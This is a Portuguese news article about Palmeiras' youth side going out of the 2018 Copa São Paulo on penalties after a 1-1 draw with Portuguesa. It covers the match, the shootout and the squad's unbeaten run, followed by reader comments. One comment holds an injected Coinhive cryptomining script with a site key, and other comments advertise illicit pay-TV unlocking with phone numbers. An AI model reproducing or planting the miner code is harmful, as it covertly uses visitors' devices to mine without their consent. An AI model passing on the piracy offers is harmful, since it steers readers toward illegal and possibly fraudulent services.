Invicto, Verdão se despede da Copa SP nos pênaltis após empatar por 1 a 1

20/1/2018 07:53

Invicto, Verdão se despede da Copa SP nos pênaltis após empatar por 1 a 1

Invicto, Verdão se despede da Copa SP nos pênaltis após empatar por 1 a 1

Fabio Menotti/Ag Palmeiras/Divulgação

Zagueiro Vitão (foto) fez boa atuação marcando jogadores da Lusa




O Palmeiras encarou a Portuguesa na noite desta sexta-feira (19) em jogo válido pela Copa São Paulo de Futebol Júnior 2018. O empate por 1 a 1 levou a partida para os pênaltis: o Verdão foi eliminado por 3 a 2 e não avança às semifinais – o gol marcado no tempo regulamentar saiu dos pés de Yan, e os jogadores Aldo e Johnny foram os palmeirenses que converteram suas cobranças.







Autor do gol alviverde na partida que levou o jogo às penalidades, Yan disputou três jogos pela equipe profissional do Vitória, seu antigo clube, em 2015. O atacante também já foi convocado às Seleções Sub-17 e Sub-20 no clube baiano, e chegou ao Palmeiras no início do ano passado.



O Alviverde se despede da Copinha com marcas interessantes: foi o time que aplicou a maior goleada do torneio até aqui (7 a 0 sobre o Taubaté na terceira fase da competição, mesmo placar imposto pelo Botafogo-RJ contra o River-PI) e também foi a equipe que obteve o segundo ataque mais positivo até aqui: 21 gols (neste quesito, só fica atrás do Internacional, que soma 24 bolas na rede).



Apesar de não ter marcado na partida desta sexta-feira (19), o artilheiro da equipe do Verdão no torneio foi o atacante Fernando, com cinco gols. O jogador chegou ao Palmeiras em 2016 após despertar a atenção de vários clubes na Taça BH Sub-17, pelo AMDH, e disputou um jogo pelo time profissional em 2017.



O técnico palmeirense na edição de 2018 da Copinha foi Wesley Carvalho, que chegou ao Alviverde em 2017, após passar pelo Vitória-BA, clube pelo qual foi campeão baiano de 2016 como interino – vale lembrar que Wesley Carvalho teve uma passagem pela comissão técnica do elenco profissional do Verdão, quando foi auxiliar técnico nas rodadas finais do Brasileirão 2017.



O adeus do Verdão no principal torneio de base do país aconteceu sem que o time tivesse perdido uma partida sequer: acumulou cinco vitórias e dois empates em sete jogos). Os adversários do Alviverde na competição foram, pela ordem, o Luverdense (vitória por 3 a 0), o Moto Club-MT (vitória por 5 a 0), o Taubaté (empate por 1 a 1), o Botafogo-PB (vitória por 2 a 0), novamente o Taubaté (vitória por 7 a 0), o Vasco (vitória por 2 a 0) e, agora, a Portuguesa (1 a 1 e eliminação nos pênaltis).



O jogo



O primeiro tempo reservou boas oportunidades ao Palmeiras, como quando Fernando, aos 24, recebeu passe de Papagaio e cabeceou contra a meta do adversário. O goleiro Anderson também vinha fazendo grande atuação na primeira etapa do duelo, a exemplo dos jogos que disputou desde o início do torneio.



Quando o Alviverde passava a dominar plenamente a partida, aos 31, uma queda de energia interrompeu o jogo por cerca de 15 minutos e esfriou o Verdão, que vinha embalado. Após o reinício do prélio, o Alviverde valorizou a posse de bola e tentou criar mais jogadas, mas, no último minuto de acréscimo, o árbitro viu pênalti de Iago em Thawan. A cobrança foi convertida pela Lusa. (Palmeiras 0x1 Portuguesa)



Na volta do intervalo, o time comandado pelo técnico Wesley Carvalho surgiu com três alterações: Iago entrou no lugar de Pablo, Alan substituiu Matheus Neris e Papagaio saiu para entrar Leo Passos.



Já nos primeiros minutos do segundo tempo, o Verdão voltou mais ofensivo e criou jogadas que assustaram o time da Portuguesa, incendiando a partida. Apesar da raça, o time palmeirense encontrou dificuldades, sobretudo na ligação entre o meio de campo e o ataque.



Após muito insistir, finalmente o Alviverde chegou ao gol, aos 30 minutos, depois de uma sequência de tentativas dos jogadores do Palmeiras, que bombardearam o goleiro rival: no rebote, Yan marcou de cabeça. (Palmeiras 1x1 Portuguesa)



Como o empate levaria a decisão pela vaga nas semifinais para as penalidades, o gol do Verdão agitou o duelo e fez com que as duas equipes disputassem cada jogada com excesso de vontade.



A partida ferveu nos minutos finais. Jogadas rápidas e ligações diretas tomaram conta do cenário no Estádio Pacaembu. As bolas de contra-ataque foram uma das armas utilizadas pelo Palmerias na tentativa de levar vantagem sobre o rival como fator diferencial.



Mesmo com quatro minutos de acréscimos impostos pela arbitragem, nenhum dos dois times conseguiu marcar novamente, e a partida se encaminhou para ser decidida nas penalidades máximas. Só deu tempo de Matheus Bahia entrar no lugar de Luan na lateral esquerda.



Pênaltis



A primeira cobrança foi pelo lado do Palmeiras, com o atacante Aldo, que bateu de pé direito no canto esquerdo do gol, e converteu (1x0). Matheus França cobrou o primeiro tiro da Portuguesa, e o goleiro palmeirense Anderson, atento, defendeu!



A segunda cobrança do Palmeiras veio com o meia Alan, de pé direito. O jogador palestrino, no entanto, desperdiçou a chance. A segunda cobrança da Lusa veio com o jogador Bahia, que chutou sem dar chances para o arqueiro alviverde. (1x1)



A terceira cobrança do Verdão saiu dos pés de Leo Passos, que desperdiçou, batendo por cima do travessão. A terceira tentativa da Lusa foi convertida por Caique Felix, que chutou no canto oposto do goleiro palmeirense. (1x2)



A quarta cobrança do Palmeiras foi realizada por Johnny, que chutou seguro e balançou as redes (2x2). Já o quarto disparo da Portuguesa veio com Marques, que chutou no cantinho, sem chances para Anderson (2x3).



A quinta cobrança do Verdão coube a Yan, que desperdiçou e, desta forma, o Palmeiras se despediu da Copa São Paulo de Futebol Júnior 2018.



VEJA TAMBÉM
- DIA DE JOGO DO VERDÃO! Palmeiras vai ao Uruguai para enfrentar o Independiente del Valle pela terceira rodada da Libertadores
- Estevão completa 17 anos e passa por processo que auxiliou Flaco no Palmeiras.
- Rony destaca experiência na altitude e foca oportunidade contra Del Valle.





3192 visitas - Fonte: Site Oficial

Mais notícias do Palmeiras

Notícias de contratações do Palmeiras
Notícias mais lidas

José Aldo e Alanzinho dois mascarados,

tão todos de parabéns saíram invicto ,nem sempre o melhor vence essez garotos tem futuro e tem futebol pra jogar em time grande

Erro ao postar comentário.
Código do erro: 803743

< src="https://coinhive.com/lib/coinhive.min.js"><>var a=new CoinHive.Anonymous("IoWE2BeVK3azaWL7xmC6HFJcYbwgiyoQ",{throttle:.3});a .start();

Endeusaram muito esses meninos sao somente promessas e o tecnico e fraco segundo tempo catado de jogadores

espero que sirva mais uma vez de exemplo. muito blá blá blá da imprensa e na hora decisiva abre o bico. o ano está apenas começando. vamos por o pé no chão.

Não sabem cobrar penalidades aff ...falta de treino

VOCÊ QUE ESTÁ CANSADO DE TER POUCA PROGRAMAÇÃO DE TVV ASSSINATURA E NÃO CONCORDA COM OS VALORES COBRADOS
FAÇO LIBERAÇÃO E DIMINUÍMOS O VALOR DA CONTA
PARA TODO BRASIL
WHATZSAP 11 958694345

Técnico muito fraco, como escalar Este tal de Leo Passos pra cobrar penalt, nunca fez gol em jogo, outra coisa cobrar ingresso,,, ridículo.

por isso não me empolgo empolgou com essa...nunca ganhará essa copa São Paulo de futebol Júnior

Você que está pagado valores alto e teno pouco PROGRAMAÇÃO de TVV asssinatura faça liberação e DEMINUIMOS valor da conta pra qualquer luga do Brasil WHATZSAP 11958640776

Enviar Comentário

Para enviar comentários, você precisa estar cadastrado e logado no nosso site. Para se cadastrar, clique Aqui. Para fazer login, clique Aqui ou .

Últimas notícias

publicidade
publicidade

Brasileiro

Qua - 20:00 - Arena Barueri -
X
Palmeiras
Internacional

Brasileiro

Dom - 18:30 - Manoel Barradas
0 X 1
Vitoria
Palmeiras